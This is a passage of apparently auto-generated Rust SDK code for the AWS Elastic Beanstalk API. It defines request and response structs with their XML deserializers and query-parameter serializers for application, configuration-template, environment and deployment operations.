#[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ApplicationName" => { obj.application_name = Some(try!(ApplicationNameDeserializer::deserialize("ApplicationName", stack))); } "DateCreated" => { obj.date_created = Some(try!(CreationDateDeserializer::deserialize("DateCreated", stack))); } "DateUpdated" => { obj.date_updated = Some(try!(UpdateDateDeserializer::deserialize("DateUpdated", stack))); } "DeploymentStatus" => { obj.deployment_status = Some(try!(ConfigurationDeploymentStatusDeserializer::deserialize("DeploymentStatus", stack))); } "Description" => { obj.description = Some(try!(DescriptionDeserializer::deserialize("Description", stack))); } "EnvironmentName" => { obj.environment_name = Some(try!(EnvironmentNameDeserializer::deserialize("EnvironmentName", stack))); } "OptionSettings" => { obj.option_settings = Some(try!(ConfigurationOptionSettingsListDeserializer::deserialize("OptionSettings", stack))); } "SolutionStackName" => { obj.solution_stack_name = Some(try!(SolutionStackNameDeserializer::deserialize("SolutionStackName", stack))); } "TemplateName" => { obj.template_name = Some(try!(ConfigurationTemplateNameDeserializer::deserialize("TemplateName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationSettingsDescriptionList = Vec<ConfigurationSettingsDescription>; struct ConfigurationSettingsDescriptionListDeserializer; impl ConfigurationSettingsDescriptionListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescriptionList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationSettingsDescriptionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>The results from a request to change the configuration settings of an environment.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsDescriptions { #[doc="<p> A list of <a>ConfigurationSettingsDescription</a>. </p>"] pub configuration_settings: Option<ConfigurationSettingsDescriptionList>, } struct ConfigurationSettingsDescriptionsDeserializer; impl ConfigurationSettingsDescriptionsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsDescriptions, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsDescriptions::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ConfigurationSettings" => { obj.configuration_settings = Some(try!(ConfigurationSettingsDescriptionListDeserializer::deserialize("ConfigurationSettings", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Provides a list of validation messages.</p>"] #[derive(Default,Debug,Clone)] pub struct ConfigurationSettingsValidationMessages { #[doc="<p> A list of <a>ValidationMessage</a>. </p>"] pub messages: Option<ValidationMessagesList>, } struct ConfigurationSettingsValidationMessagesDeserializer; impl ConfigurationSettingsValidationMessagesDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationSettingsValidationMessages, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ConfigurationSettingsValidationMessages::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Messages" => { obj.messages = Some(try!(ValidationMessagesListDeserializer::deserialize("Messages", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationTemplateName = String; struct ConfigurationTemplateNameDeserializer; impl ConfigurationTemplateNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationTemplateName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ConfigurationTemplateNamesList = Vec<ConfigurationTemplateName>; struct ConfigurationTemplateNamesListDeserializer; impl ConfigurationTemplateNamesListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ConfigurationTemplateNamesList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ConfigurationTemplateNameDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>Request to create an application.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateApplicationMessage { #[doc="<p>The name of the application.</p> <p>Constraint: This name must be unique within your account. If the specified name already exists, the action returns an <code>InvalidParameterValue</code> error.</p>"] pub application_name: ApplicationName, #[doc="<p>Describes the application.</p>"] pub description: Option<Description>, #[doc="<p>Specify an application resource lifecycle configuration to prevent your application from accumulating too many versions.</p>"] pub resource_lifecycle_config: Option<ApplicationResourceLifecycleConfig>, } /// Serialize `CreateApplicationMessage` contents to a `SignedRequest`. struct CreateApplicationMessageSerializer; impl CreateApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.resource_lifecycle_config { ApplicationResourceLifecycleConfigSerializer::serialize( params, &format!("{}{}", prefix, "ResourceLifecycleConfig"), field_value, ); } } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct CreateApplicationVersionMessage { #[doc="<p> The name of the application. If no application is found with this name, and <code>AutoCreateApplication</code> is <code>false</code>, returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>Set to <code>true</code> to create an application with the specified name if it doesn't already exist.</p>"] pub auto_create_application: Option<AutoCreateApplication>, #[doc="<p>Settings for an AWS CodeBuild build.</p>"] pub build_configuration: Option<BuildConfiguration>, #[doc="<p>Describes this version.</p>"] pub description: Option<Description>, #[doc="<p>Preprocesses and validates the environment manifest and configuration files in the source bundle. Validating configuration files can identify issues prior to deploying the application version to an environment.</p>"] pub process: Option<ApplicationVersionProccess>, #[doc="<p>Specify a commit in an AWS CodeCommit Git repository to use as the source code for the application version.</p>"] pub source_build_information: Option<SourceBuildInformation>, #[doc="<p>The Amazon S3 bucket and key that identify the location of the source bundle for this version.</p> <note> <p>The Amazon S3 bucket must be in the same region as the environment.</p> </note> <p>Specify a source bundle in S3 or a commit in an AWS CodeCommit repository (with <code>SourceBuildInformation</code>), but not both. If neither <code>SourceBundle</code> nor <code>SourceBuildInformation</code> are provided, Elastic Beanstalk uses a sample application.</p>"] pub source_bundle: Option<S3Location>, #[doc="<p>A label identifying this version.</p> <p>Constraint: Must be unique per application. If an application version already exists with this label for the specified application, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub version_label: VersionLabel, } /// Serialize `CreateApplicationVersionMessage` contents to a `SignedRequest`. struct CreateApplicationVersionMessageSerializer; impl CreateApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.auto_create_application { params.put(&format!("{}{}", prefix, "AutoCreateApplication"), &field_value.to_string()); } if let Some(ref field_value) = obj.build_configuration { BuildConfigurationSerializer::serialize( params, &format!("{}{}", prefix, "BuildConfiguration"), field_value, ); } if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.process { params.put(&format!("{}{}", prefix, "Process"), &field_value.to_string()); } if let Some(ref field_value) = obj.source_build_information { SourceBuildInformationSerializer::serialize( params, &format!("{}{}", prefix, "SourceBuildInformation"), field_value, ); } if let Some(ref field_value) = obj.source_bundle { S3LocationSerializer::serialize( params, &format!("{}{}", prefix, "SourceBundle"), field_value, ); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>Request to create a configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateConfigurationTemplateMessage { #[doc="<p>The name of the application to associate with this configuration template. If no application is found with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>Describes this configuration.</p>"] pub description: Option<Description>, #[doc="<p>The ID of the environment used with this configuration template.</p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>If specified, AWS Elastic Beanstalk sets the specified configuration option to the requested value. The new value overrides the value obtained from the solution stack or the source configuration template.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>The name of the solution stack used by this configuration. The solution stack specifies the operating system, architecture, and application server for a configuration template. It determines the set of configuration options as well as the possible and default values.</p> <p> Use <a>ListAvailableSolutionStacks</a> to obtain a list of available solution stacks. </p> <p> A solution stack name or a source configuration parameter must be specified, otherwise AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p>If a solution stack name is not specified and the source configuration parameter is specified, AWS Elastic Beanstalk uses the same solution stack as the source configuration template.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>If specified, AWS Elastic Beanstalk uses the configuration values from the specified configuration template to create a new configuration.</p> <p> Values specified in the <code>OptionSettings</code> parameter of this call overrides any values obtained from the <code>SourceConfiguration</code>. </p> <p> If no configuration template is found, returns an <code>InvalidParameterValue</code> error. </p> <p> Constraint: If both the solution stack name parameter and the source configuration parameters are specified, the solution stack of the source configuration template must match the specified solution stack name or else AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. </p>"] pub source_configuration: Option<SourceConfiguration>, #[doc="<p>The name of the configuration template.</p> <p>Constraint: This name must be unique per application.</p> <p>Default: If a configuration template already exists with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `CreateConfigurationTemplateMessage` contents to a `SignedRequest`. struct CreateConfigurationTemplateMessageSerializer; impl CreateConfigurationTemplateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateConfigurationTemplateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.source_configuration { SourceConfigurationSerializer::serialize( params, &format!("{}{}", prefix, "SourceConfiguration"), field_value, ); } params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name); } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct CreateEnvironmentMessage { #[doc="<p>The name of the application that contains the version to be deployed.</p> <p> If no application is found with this name, <code>CreateEnvironment</code> returns an <code>InvalidParameterValue</code> error. </p>"] pub application_name: ApplicationName, #[doc="<p>If specified, the environment attempts to use this value as the prefix for the CNAME. If not specified, the CNAME is generated automatically by appending a random alphanumeric string to the environment name.</p>"] pub cname_prefix: Option<DNSCnamePrefix>, #[doc="<p>Describes this environment.</p>"] pub description: Option<Description>, #[doc="<p>A unique name for the deployment environment. Used in the application URL.</p> <p>Constraint: Must be from 4 to 40 characters in length. The name can contain only letters, numbers, and hyphens. It cannot start or end with a hyphen. This name must be unique in your account. If the specified name already exists, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p>Default: If the CNAME parameter is not specified, the environment name becomes part of the CNAME, and therefore part of the visible URL for your application.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The name of the group to which the target environment belongs. Specify a group name only if the environment's name is specified in an environment manifest and not with the environment name parameter. See <a href=\"http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/environment-cfg-manifest.html\">Environment Manifest (env.yaml)</a> for details.</p>"] pub group_name: Option<GroupName>, #[doc="<p>If specified, AWS Elastic Beanstalk sets the specified configuration options to the requested value in the configuration set for the new environment. These override the values obtained from the solution stack or the configuration template.</p>"] pub option_settings: Option<ConfigurationOptionSettingsList>, #[doc="<p>A list of custom user-defined configuration options to remove from the configuration set for this new environment.</p>"] pub options_to_remove: Option<OptionsSpecifierList>, #[doc="<p>This is an alternative to specifying a template name. If specified, AWS Elastic Beanstalk sets the configuration values to the default values associated with the specified solution stack.</p> <p> Condition: You must specify either this or a <code>TemplateName</code>, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>This specifies the tags applied to resources in the environment.</p>"] pub tags: Option<Tags>, #[doc="<p> The name of the configuration template to use in deployment. If no configuration template is found with this name, AWS Elastic Beanstalk returns an <code>InvalidParameterValue</code> error. </p> <p> Condition: You must specify either this parameter or a <code>SolutionStackName</code>, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub template_name: Option<ConfigurationTemplateName>, #[doc="<p>This specifies the tier to use for creating this environment.</p>"] pub tier: Option<EnvironmentTier>, #[doc="<p>The name of the application version to deploy.</p> <p> If the specified application has no associated application versions, AWS Elastic Beanstalk <code>UpdateEnvironment</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Default: If not specified, AWS Elastic Beanstalk attempts to launch the sample application in the container.</p>"] pub version_label: Option<VersionLabel>, } /// Serialize `CreateEnvironmentMessage` contents to a `SignedRequest`. struct CreateEnvironmentMessageSerializer; impl CreateEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &CreateEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.cname_prefix { params.put(&format!("{}{}", prefix, "CNAMEPrefix"), &field_value); } if let Some(ref field_value) = obj.description { params.put(&format!("{}{}", prefix, "Description"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.group_name { params.put(&format!("{}{}", prefix, "GroupName"), &field_value); } if let Some(ref field_value) = obj.option_settings { ConfigurationOptionSettingsListSerializer::serialize( params, &format!("{}{}", prefix, "OptionSettings"), field_value, ); } if let Some(ref field_value) = obj.options_to_remove { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "OptionsToRemove"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.tags { TagsSerializer::serialize( params, &format!("{}{}", prefix, "Tags"), field_value, ); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } if let Some(ref field_value) = obj.tier { EnvironmentTierSerializer::serialize( params, &format!("{}{}", prefix, "Tier"), field_value, ); } if let Some(ref field_value) = obj.version_label { params.put(&format!("{}{}", prefix, "VersionLabel"), &field_value); } } } #[doc="<p>Results of a <a>CreateStorageLocationResult</a> call.</p>"] #[derive(Default,Debug,Clone)] pub struct CreateStorageLocationResultMessage { #[doc="<p>The name of the Amazon S3 bucket created.</p>"] pub s3_bucket: Option<S3Bucket>, } struct CreateStorageLocationResultMessageDeserializer; impl CreateStorageLocationResultMessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CreateStorageLocationResultMessage, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = CreateStorageLocationResultMessage::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "S3Bucket" => { obj.s3_bucket = Some(try!(S3BucketDeserializer::deserialize("S3Bucket", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type CreationDate = String; struct CreationDateDeserializer; impl CreationDateDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<CreationDate, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type DNSCname = String; struct DNSCnameDeserializer; impl DNSCnameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DNSCname, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type DNSCnamePrefix = String; #[doc="<p>Request to delete an application.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteApplicationMessage { #[doc="<p>The name of the application to delete.</p>"] pub application_name: ApplicationName, #[doc="<p>When set to true, running environments will be terminated before deleting the application.</p>"] pub terminate_env_by_force: Option<TerminateEnvForce>, } /// Serialize `DeleteApplicationMessage` contents to a `SignedRequest`. struct DeleteApplicationMessageSerializer; impl DeleteApplicationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteApplicationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.terminate_env_by_force { params.put(&format!("{}{}", prefix, "TerminateEnvByForce"), &field_value.to_string()); } } } #[doc="<p>Request to delete an application version.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteApplicationVersionMessage { #[doc="<p>The name of the application to which the version belongs.</p>"] pub application_name: ApplicationName, #[doc="<p>Set to <code>true</code> to delete the source bundle from your storage bucket. Otherwise, the application version is deleted only from Elastic Beanstalk and the source bundle remains in Amazon S3.</p>"] pub delete_source_bundle: Option<DeleteSourceBundle>, #[doc="<p>The label of the version to delete.</p>"] pub version_label: VersionLabel, } /// Serialize `DeleteApplicationVersionMessage` contents to a `SignedRequest`. struct DeleteApplicationVersionMessageSerializer; impl DeleteApplicationVersionMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteApplicationVersionMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.delete_source_bundle { params.put(&format!("{}{}", prefix, "DeleteSourceBundle"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "VersionLabel"), &obj.version_label); } } #[doc="<p>Request to delete a configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteConfigurationTemplateMessage { #[doc="<p>The name of the application to delete the configuration template from.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the configuration template to delete.</p>"] pub template_name: ConfigurationTemplateName, } /// Serialize `DeleteConfigurationTemplateMessage` contents to a `SignedRequest`. struct DeleteConfigurationTemplateMessageSerializer; impl DeleteConfigurationTemplateMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteConfigurationTemplateMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); params.put(&format!("{}{}", prefix, "TemplateName"), &obj.template_name); } } #[doc="<p>Request to delete a draft environment configuration.</p>"] #[derive(Default,Debug,Clone)] pub struct DeleteEnvironmentConfigurationMessage { #[doc="<p>The name of the application the environment is associated with.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the environment to delete the draft configuration from.</p>"] pub environment_name: EnvironmentName, } /// Serialize `DeleteEnvironmentConfigurationMessage` contents to a `SignedRequest`. struct DeleteEnvironmentConfigurationMessageSerializer; impl DeleteEnvironmentConfigurationMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DeleteEnvironmentConfigurationMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); params.put(&format!("{}{}", prefix, "EnvironmentName"), &obj.environment_name); } } pub type DeleteSourceBundle = bool; #[doc="<p>Information about an application version deployment.</p>"] #[derive(Default,Debug,Clone)] pub struct Deployment { #[doc="<p>The ID of the deployment. This number increases by one each time that you deploy source code or change instance configuration settings.</p>"] pub deployment_id: Option<NullableLong>, #[doc="<p>For in-progress deployments, the time that the deloyment started.</p> <p>For completed deployments, the time that the deployment ended.</p>"] pub deployment_time: Option<DeploymentTimestamp>, #[doc="<p>The status of the deployment:</p> <ul> <li> <p> <code>In Progress</code> : The deployment is in progress.</p> </li> <li> <p> <code>Deployed</code> : The deployment succeeded.</p> </li> <li> <p> <code>Failed</code> : The deployment failed.</p> </li> </ul>"] pub status: Option<String>, #[doc="<p>The version label of the application version in the deployment.</p>"] pub version_label: Option<String>, } struct DeploymentDeserializer; impl DeploymentDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Deployment, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Deployment::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeploymentId" => { obj.deployment_id = Some(try!(NullableLongDeserializer::deserialize("DeploymentId", stack))); } "DeploymentTime" => { obj.deployment_time = Some(try!(DeploymentTimestampDeserializer::deserialize("DeploymentTime", stack))); } "Status" => { obj.status = Some(try!(StringDeserializer::deserialize("Status", stack))); } "VersionLabel" => { obj.version_label = Some(try!(StringDeserializer::deserialize("VersionLabel", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type DeploymentTimestamp = String; struct DeploymentTimestampDeserializer; impl DeploymentTimestampDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<DeploymentTimestamp, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to describe application versions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeApplicationVersionsMessage { #[doc="<p>Specify an application name to show only application versions for that application.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>Specify a maximum number of application versions to paginate in the request.</p>"] pub max_records: Option<MaxRecords>, #[doc="<p>Specify a next token to retrieve the next page in a paginated request.</p>"] pub next_token: Option<Token>, #[doc="<p>Specify a version label to show a specific application version.</p>"] pub version_labels: Option<VersionLabelsList>, } /// Serialize `DescribeApplicationVersionsMessage` contents to a `SignedRequest`. struct DescribeApplicationVersionsMessageSerializer; impl DescribeApplicationVersionsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeApplicationVersionsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.max_records { params.put(&format!("{}{}", prefix, "MaxRecords"), &field_value.to_string()); } if let Some(ref field_value) = obj.next_token { params.put(&format!("{}{}", prefix, "NextToken"), &field_value); } if let Some(ref field_value) = obj.version_labels { VersionLabelsListSerializer::serialize( params, &format!("{}{}", prefix, "VersionLabels"), field_value, ); } } } #[doc="<p>Request to describe one or more applications.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeApplicationsMessage { #[doc="<p>If specified, AWS Elastic Beanstalk restricts the returned descriptions to only include those with the specified names.</p>"] pub application_names: Option<ApplicationNamesList>, } /// Serialize `DescribeApplicationsMessage` contents to a `SignedRequest`. struct DescribeApplicationsMessageSerializer; impl DescribeApplicationsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeApplicationsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_names { ApplicationNamesListSerializer::serialize( params, &format!("{}{}", prefix, "ApplicationNames"), field_value, ); } } } #[doc="<p>Result message containig a list of application version descriptions.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeConfigurationOptionsMessage { #[doc="<p>The name of the application associated with the configuration template or environment. Only needed if you want to describe the configuration options associated with either the configuration template or environment.</p>"] pub application_name: Option<ApplicationName>, #[doc="<p>The name of the environment whose configuration options you want to describe.</p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>If specified, restricts the descriptions to only the specified options.</p>"] pub options: Option<OptionsSpecifierList>, #[doc="<p>The name of the solution stack whose configuration options you want to describe.</p>"] pub solution_stack_name: Option<SolutionStackName>, #[doc="<p>The name of the configuration template whose configuration options you want to describe.</p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `DescribeConfigurationOptionsMessage` contents to a `SignedRequest`. struct DescribeConfigurationOptionsMessageSerializer; impl DescribeConfigurationOptionsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeConfigurationOptionsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.application_name { params.put(&format!("{}{}", prefix, "ApplicationName"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.options { OptionsSpecifierListSerializer::serialize( params, &format!("{}{}", prefix, "Options"), field_value, ); } if let Some(ref field_value) = obj.solution_stack_name { params.put(&format!("{}{}", prefix, "SolutionStackName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } #[doc="<p>Result message containing all of the configuration settings for a specified solution stack or configuration template.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeConfigurationSettingsMessage { #[doc="<p>The application for the environment or configuration template.</p>"] pub application_name: ApplicationName, #[doc="<p>The name of the environment to describe.</p> <p> Condition: You must specify either this or a TemplateName, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The name of the configuration template to describe.</p> <p> Conditional: You must specify either this parameter or an EnvironmentName, but not both. If you specify both, AWS Elastic Beanstalk returns an <code>InvalidParameterCombination</code> error. If you do not specify either, AWS Elastic Beanstalk returns a <code>MissingRequiredParameter</code> error. </p>"] pub template_name: Option<ConfigurationTemplateName>, } /// Serialize `DescribeConfigurationSettingsMessage` contents to a `SignedRequest`. struct DescribeConfigurationSettingsMessageSerializer; impl DescribeConfigurationSettingsMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &DescribeConfigurationSettingsMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } params.put(&format!("{}{}", prefix, "ApplicationName"), &obj.application_name); if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } if let Some(ref field_value) = obj.template_name { params.put(&format!("{}{}", prefix, "TemplateName"), &field_value); } } } #[doc="<p>See the example below to learn how to create a request body.</p>"] #[derive(Default,Debug,Clone)] pub struct DescribeEnvironmentHealthRequest { #[doc="<p>Specify the response elements to return. To retrieve all attributes, set to <code>All</code>. If no attribute names are specified, returns the name of the environment.</p>"] pub attribute_names: Option<EnvironmentHealthAttributes>, 